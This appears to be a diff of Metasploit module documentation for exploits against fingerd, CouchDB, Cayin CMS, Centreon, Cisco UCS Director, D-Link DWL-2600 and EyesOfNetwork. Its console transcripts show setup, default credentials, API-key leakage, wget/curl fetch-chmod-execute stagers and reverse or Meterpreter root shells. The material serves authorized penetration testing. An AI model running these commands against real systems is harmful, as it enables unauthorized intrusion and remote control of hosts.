Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
|
||||
|
||||
## Setup
|
||||
### Setup
|
||||
|
||||
A Docker environment for 4.3BSD on VAX is available at
|
||||
<https://github.com/wvu/ye-olde-bsd>.
|
||||
@@ -14,36 +17,41 @@ For manual setup, please follow the Computer History Wiki's
|
||||
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||||
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
```
|
||||
### 0
|
||||
|
||||
This targets `fingerd` version 5.1 from 1985-06-06.
|
||||
|
||||
## Options
|
||||
|
||||
**RPORT**
|
||||
### RPORT
|
||||
|
||||
Set this to the target port. The default is 79 for `fingerd`, but the
|
||||
port may be forwarded when NAT (SLiRP) is used in SIMH.
|
||||
|
||||
**PAYLOAD**
|
||||
### PAYLOAD
|
||||
|
||||
Set this to a BSD VAX payload. Currently only
|
||||
Set this to a BSD VAX payload. Currently, only
|
||||
`bsd/vax/shell_reverse_tcp` is supported.
|
||||
|
||||
## Usage
|
||||
## Scenarios
|
||||
|
||||
### `fingerd` 5.1 on 4.3BSD
|
||||
|
||||
```
|
||||
msf5 > use exploit/bsd/finger/morris_fingerd_bof
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
|
||||
|
||||
Module options (exploit/bsd/finger/morris_fingerd_bof):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 79 yes The target port (TCP)
|
||||
|
||||
|
||||
@@ -51,7 +59,7 @@ Payload options (bsd/vax/shell_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
@@ -62,15 +70,19 @@ Exploit target:
|
||||
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
|
||||
|
||||
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] 127.0.0.1:79 - Connecting to fingerd
|
||||
[*] 127.0.0.1:79 - Sending 533-byte buffer
|
||||
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
|
||||
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
|
||||
|
||||
whoami
|
||||
nobody
|
||||
who am i
|
||||
nobody tty?? Feb 6 13:45
|
||||
cat /etc/motd
|
||||
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
|
||||
|
||||
|
||||
@@ -1,6 +1,9 @@
|
||||
## Description
|
||||
|
||||
CouchDB administrative users can configure the database server via HTTP(S).Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,including downloading and executing scripts from the public internet.
|
||||
CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options
|
||||
include paths for operating system-level binaries that are subsequently launched by CouchDB.
|
||||
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell
|
||||
commands as the CouchDB user,including downloading and executing scripts from the public internet.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
@@ -12,15 +15,13 @@ Couchdb 2.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
|
||||
Couchdb 1.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636
|
||||
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
### Vulnerable Application Installation Setup.
|
||||
|
||||
Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb```
|
||||
@@ -37,18 +38,18 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
|
||||
|
||||
## Options
|
||||
|
||||
- URIPATH
|
||||
### URIPATH
|
||||
|
||||
``URIPATH`` by default is random, you can change it if you want.
|
||||
|
||||
- HttpUsername, HttpPassword
|
||||
### HttpUsername, HttpPassword
|
||||
|
||||
Sometimes it requires authentication, set these options to authorize.
|
||||
Sometimes it requires authentication, set these options to authorize.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
TESTED AGAINST LINUX
|
||||
### Apache CouchDB on Linux
|
||||
|
||||
```
|
||||
msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb
|
||||
|
||||
@@ -0,0 +1,70 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits an authenticated RCE in Cayin CMS <= 11.0. The
|
||||
RCE is executed in the `system_service.cgi` file's `ntpIp` Parameter.
|
||||
The field is limited in size, so repeated requests are made to
|
||||
achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04
|
||||
(20.04 failed to install correctly), so the environment should be
|
||||
pretty set and not dynamic between targets. Results in root level
|
||||
access.
|
||||
|
||||
With CMS-SE's UI there are several options for NTP server.
|
||||
|
||||
1. Test (this runs the RCE 3 times, thus is exploitable, a different
|
||||
strategy like `wget` would be required)
|
||||
2. Save (saves the data, but doesn't run it)
|
||||
3. Update (what was used in this exploit)
|
||||
|
||||
Default authentication for the system is administrator:admin from
|
||||
[Guide](http://onlinehelp.cayintech.com/cmsServer/MCS110EN-01/Web_Manager.html)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application on Ubuntu 16.04
|
||||
2. Start msfconsole
|
||||
3. Do: ```exploits/linux/http/cayin_cms_ntp```
|
||||
4. Do: ```set rhosts [ip]```
|
||||
5. Do: ```run```
|
||||
6. You should get a root shell.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04
|
||||
|
||||
```
|
||||
[*] Processing cayin_cms.rb for ERB directives.
|
||||
resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
|
||||
resource (cayin_cms.rb)> set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
resource (cayin_cms.rb)> set lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
resource (cayin_cms.rb)> set lport 6666
|
||||
lport => 6666
|
||||
resource (cayin_cms.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (cayin_cms.rb)> check
|
||||
[+] Cayin CMS install detected
|
||||
[*] 2.2.2.2:80 - The service is running, but could not be validated.
|
||||
resource (cayin_cms.rb)> exploit
|
||||
[*] Started reverse TCP handler on 1.1.1.1:6666
|
||||
[+] Cayin CMS install detected
|
||||
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
|
||||
[*] Command Stager progress - 26.60% done (199/748 bytes)
|
||||
[*] Command Stager progress - 53.07% done (397/748 bytes)
|
||||
[*] Command Stager progress - 79.81% done (597/748 bytes)
|
||||
[*] Transmitting intermediate stager...(106 bytes)
|
||||
[*] Sending stage (980808 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
|
||||
[*] Command Stager progress - 100.00% done (748/748 bytes)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
|
||||
meterpreter > sysinfo
|
||||
Computer : CMS-SE
|
||||
OS : Ubuntu 16.04 (Linux 4.4.0-179-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
```
|
||||
@@ -0,0 +1,101 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Centreon is an open source IT monitoring solution by Centreon, a leading Paris-based software company.
|
||||
|
||||
An authenticated user with sufficient administrative rights to manage pollers can use this functionality to
|
||||
execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules
|
||||
(to perform certain actions), by the scheduler for data processing, etc.
|
||||
|
||||
This module uses this functionality to obtain a remote shell on the target.
|
||||
|
||||
Tested on:
|
||||
|
||||
* [Centreon 19.10.8](http://vm.download.centreon.com/centreon-vbox-vm-19_10-3.el7.ovf.zip)
|
||||
* [Centreon 19.10.5](http://vm.download.centreon.com/centreon-vbox-vm-19_10-1.el7.ovf.zip)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the module as usual
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/centreon_pollers_auth_rce`
|
||||
4. Do: `set RHOSTS [IP]`
|
||||
5. Do: `set LHOST [IP]`
|
||||
6. Do: `set USERNAME [USERNAME]`
|
||||
7. Do: `sat PASSWORD [PASSWORD]`
|
||||
8. Do: `set VERBOSE true`
|
||||
9. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/centreon_pollers_auth_rce
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP]
|
||||
rhosts => [IP]
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set username admin
|
||||
username => admin
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set password centreon
|
||||
password => centreon
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP]
|
||||
lhost => [IP]
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set verbose true
|
||||
verbose => true
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
|
||||
[*] Send authentication request.
|
||||
[*] Successful authenticated.
|
||||
[*] Upload command payload on the target.
|
||||
[*] Create new poller entry on the target.
|
||||
[*] Reload the poller to trigger exploitation.
|
||||
[*] -- Generating files.
|
||||
[*] -- Restarting engine.
|
||||
[*] -- Executing command.
|
||||
[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:59624) at 2020-02-03 17:41:13 +0400
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)
|
||||
|
||||
--or--
|
||||
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1
|
||||
target => 1
|
||||
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
|
||||
[*] Send authentication request.
|
||||
[*] Successful authenticated.
|
||||
[*] Using URL: http://0.0.0.0:8080/fNqJS82wB
|
||||
[*] Local IP: http://XXX.XXX.XXX.XXX:8080/fNqJS82wB
|
||||
[*] Generated command stager: ["curl -so /tmp/MBoYQsJv http://XXX.XXX.XXX.XXX:8080/fNqJS82wB;chmod +x /tmp/MBoYQsJv;/tmp/MBoYQsJv;rm -f /tmp/MBoYQsJv"]
|
||||
[*] Upload command payload on the target.
|
||||
[*] Create new poller entry on the target.
|
||||
[*] Reload the poller to trigger exploitation.
|
||||
[*] -- Generating files.
|
||||
[*] -- Restarting engine.
|
||||
[*] -- Executing command.
|
||||
[*] Client XXX.XXX.XXX.XXX (curl/7.29.0) requested /fNqJS82wB
|
||||
[*] Sending payload to XXX.XXX.XXX.XXX (curl/7.29.0)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3021284 bytes) to XXX.XXX.XXX.XXX
|
||||
[*] Meterpreter session 2 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:60536) at 2020-02-03 17:44:47 +0400
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=48, gid=48, euid=48, egid=48
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
## Targets
|
||||
|
||||
```
|
||||
Id Name
|
||||
-- ----
|
||||
0 Reverse shell (In-Memory)
|
||||
1 Meterpreter (Dropper)
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
1. <https://www.exploit-db.com/exploits/47969>
|
||||
2. <https://www.exploit-db.com/exploits/47977>
|
||||
3. <https://www.exploit-db.com/exploits/47978>
|
||||
@@ -0,0 +1,143 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits an authentication bypass and directory traversals
|
||||
in Cisco UCS Director < 6.7.4.0 to leak the administrator's REST API
|
||||
key and execute a Cloupia script containing an arbitrary root command.
|
||||
|
||||
Note that the primary functionality of this module is to leverage the
|
||||
Cloupia script interpreter to execute code. This functionality is part
|
||||
of the application's intended operation and considered a "foreverday."
|
||||
The authentication bypass and directory traversals only get us there.
|
||||
|
||||
If you already have an API key, you may set it in the `API_KEY` option.
|
||||
The `LEAK_FILE` option may be set if you wish to leak the API key from a
|
||||
different absolute path, but normally this isn't advisable.
|
||||
|
||||
Tested on Cisco's VMware distribution of 6.7.3.0.
|
||||
|
||||
### Setup
|
||||
|
||||
**Note:** You will need a Cisco account to proceed, particularly for
|
||||
**software.cisco.com**. _\*Cough\*_
|
||||
|
||||
1. Download
|
||||
[CUCSD_6_7_3_0_67414_VMWARE_SIGNED_EVAL.zip](https://software.cisco.com/download/home/286320555/type/285018084/release/6)
|
||||
2. Unzip `CUCSD_6_7_3_0_67414_VMWARE_SIGNED_EVAL.zip` and unzip
|
||||
`CUCSD_6_7_3_0_67414_VMWARE_GA.zip` inside it
|
||||
3. Import `CUCSD_6_7_3_0_67414.ovf` into VMware or your preferred
|
||||
virtualization software
|
||||
4. Start the VM and wait for the system to finish booting
|
||||
5. Visit <https://[RHOST]/app/ui/login.jsp>, where `[RHOST]` is the
|
||||
target's IP
|
||||
6. Wait nearly forever for the system to finish initializing
|
||||
7. Sign in with `admin:admin` to log the admin's REST API key in
|
||||
`/opt/infra/idaccessmgr/logfile.txt`
|
||||
|
||||
You are now ready to test the module using the steps below.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Targets
|
||||
|
||||
### 0
|
||||
|
||||
This executes a Unix command.
|
||||
|
||||
### 1
|
||||
|
||||
This uses a Linux dropper to execute code.
|
||||
|
||||
## Options
|
||||
|
||||
### API_KEY
|
||||
|
||||
If you already have an admin REST API key, you can authenticate with it
|
||||
by setting this option.
|
||||
|
||||
### LEAK_FILE
|
||||
|
||||
This is the file to leak the API key from, specified as an absolute
|
||||
path. It defaults to `/opt/infra/idaccessmgr/logfile.txt`, and you
|
||||
shouldn't need to change it.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Cisco UCS Director 6.7.3.0 VMware distribution
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/cisco_ucs_cloupia_script_rce
|
||||
msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > options
|
||||
|
||||
Module options (exploit/linux/http/cisco_ucs_cloupia_script_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
API_KEY no API key if you have it
|
||||
LEAK_FILE /opt/infra/idaccessmgr/logfile.txt yes Leak API key from this file (absolute path)
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI / yes Base path
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux Dropper
|
||||
|
||||
|
||||
msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158
|
||||
rhosts => 172.16.249.158
|
||||
msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1
|
||||
lhost => 172.16.249.1
|
||||
msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.249.1:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[!] The service is running, but could not be validated. Target is running Cisco UCS Director.
|
||||
[*] Creating exports directory
|
||||
[+] Successfully created exports directory
|
||||
[*] Leaking API key from /opt/infra/idaccessmgr/logfile.txt
|
||||
[+] Successfully dumped /opt/infra/idaccessmgr/logfile.txt
|
||||
[+] Found API key: FE30858BE2FD4BAB8208F5A1DE909AAD
|
||||
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
|
||||
[*] Using URL: http://0.0.0.0:8080/vV8W6PFtOmPZIe
|
||||
[*] Local IP: http://192.168.1.3:8080/vV8W6PFtOmPZIe
|
||||
[*] Generated command stager: ["wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX"]
|
||||
[*] Executing command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
|
||||
[+] Successfully executed command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
|
||||
[*] Client 172.16.249.158 (Wget/1.12 (linux-gnu)) requested /vV8W6PFtOmPZIe
|
||||
[*] Sending payload to 172.16.249.158 (Wget/1.12 (linux-gnu))
|
||||
[*] Command Stager progress - 100.00% done (119/119 bytes)
|
||||
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.158:35570) at 2020-05-10 05:46:44 -0500
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root @ localhost (uid=0, gid=0, euid=0, egid=0)
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdom
|
||||
OS : CentOS 6.7 (Linux 2.6.32-754.6.3.el6.x86_64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,63 @@
|
||||
# DLINK DWL-2600 Authenticated Command Injection
|
||||
|
||||
## Overview
|
||||
DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vulnerability. This vulnerability was originally discovered by RAKI BEN HAMOUDA and posted to exploit db here: [https://www.exploit-db.com/exploits/46841](https://www.exploit-db.com/exploits/46841). Original testing was performed against firmware version `4.2.0.15` though other versions are likely affected.
|
||||
|
||||
## Options
|
||||
### HttpUsername
|
||||
Defaults to admin, this is the username that is used to authenticate to the device
|
||||
### HttpPassword
|
||||
Defaults to admin, this is hte password that is used to authenticate to the device
|
||||
### DOWNHOST
|
||||
Alternative host to request MIPS payload from.
|
||||
### DOWNFILE
|
||||
File name to download - defaults to a random value.
|
||||
### HTTP_DELAY
|
||||
Time that the HTTP Server will wait for the ELF payload request.
|
||||
|
||||
In addition you will probably want to set `LHOST` and `SRVHOST`.
|
||||
|
||||
## Payloads
|
||||
```
|
||||
msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads
|
||||
|
||||
Compatible Payloads
|
||||
===================
|
||||
|
||||
# Name Disclosure Date Rank Check Description
|
||||
- ---- --------------- ---- ----- -----------
|
||||
0 generic/custom normal No Custom Payload
|
||||
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
|
||||
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
|
||||
3 linux/mipsle/exec normal No Linux Execute Command
|
||||
4 linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
|
||||
5 linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
|
||||
6 linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
|
||||
7 linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
|
||||
8 linux/mipsle/reboot normal No Linux Reboot
|
||||
9 linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
|
||||
10 linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
|
||||
11 linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
|
||||
|
||||
```
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.0.101:4444
|
||||
[*] 192.168.0.100:80 - Trying to login with admin / admin
|
||||
[+] 192.168.0.100:80 - Successful login admin/admin
|
||||
[+] 192.168.0.100:80 - Received Auth token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
|
||||
[*] Using URL: http://0.0.0.0:8080/mnHnGuZ0euTGyf5
|
||||
[*] Local IP: http://192.168.0.101:8080/mnHnGuZ0euTGyf5
|
||||
[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
|
||||
[*] Client 192.168.0.100 (Wget) requested /mnHnGuZ0euTGyf5
|
||||
[*] Sending payload to 192.168.0.100 (Wget)
|
||||
[*] Command Stager progress - 54.24% done (64/118 bytes)
|
||||
[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
|
||||
[*] Command Stager progress - 72.88% done (86/118 bytes)
|
||||
[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
|
||||
[*] Command shell session 3 opened (192.168.0.101:4444 -> 192.168.0.100:33318) at 2020-03-26 20:10:26 -0500
|
||||
[*] Server stopped.
|
||||
```
|
||||
@@ -0,0 +1,130 @@
|
||||
## Vulnerable Application
|
||||
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary
|
||||
commands as root.
|
||||
|
||||
The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts
|
||||
an authentication bypass via an SQL injection in the `user_id` field in a cookie (CVE-2020-9465). If version 5.3 is
|
||||
detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to
|
||||
generate a valid access token and uses it to create a new user with admin privileges. If the generated key is not valid,
|
||||
the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this
|
||||
doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
|
||||
|
||||
For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability
|
||||
in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically,
|
||||
the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap
|
||||
host discovery scan against the target. This achieves privilege escalation because the default sudo configuration
|
||||
permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
|
||||
|
||||
The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative
|
||||
privileges are required. However, as explained above, the module can bypass authentication via various methods,
|
||||
depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
|
||||
|
||||
## Verification Steps
|
||||
1. Install the module as usual
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
|
||||
4. Do: `set RHOSTS [IP]`
|
||||
5. Do: `set payload [payload]`
|
||||
6. Do: `set LHOST [IP]`
|
||||
7. Do: `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### SERVER_ADDR
|
||||
This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from `RHOST`.
|
||||
This because the EON server IP is needed to generate the API key.
|
||||
|
||||
### SQLI_SLEEP
|
||||
The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default
|
||||
value is 1.
|
||||
|
||||
## Scenarios
|
||||
1. EyesOfNetwork version 5.1
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SERVER_ADDR yes EyesOfNetwork server IP address (if different from RHOST)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI / yes Base path to EyesOfNetwork
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux (x64)
|
||||
|
||||
|
||||
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465.
|
||||
[+] The target seems vulnerable.
|
||||
[*] Verified that the admin user has at least one active session.
|
||||
[*] Found the admin 'session_id' size: 31
|
||||
[*] Calculating the admin 'session_id' value. This will take a while...
|
||||
[+] Obtained admin 'session_id' value: 1856115646
|
||||
[*] Command Stager progress - 100.00% done (897/897 bytes)
|
||||
[*] Sending stage (3012516 bytes) to 192.168.1.1
|
||||
[*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
|
||||
```
|
||||
|
||||
2. EyesOfNetwork version 5.2
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465.
|
||||
[+] The target seems vulnerable.
|
||||
[*] Verified that the admin user has at least one active session.
|
||||
[*] Found the admin 'session_id' size: 31
|
||||
[*] Calculating the admin 'session_id' value. This will take a while...
|
||||
[+] Obtained admin 'session_id' value: 1445224287
|
||||
[*] Command Stager progress - 100.00% done (897/897 bytes)
|
||||
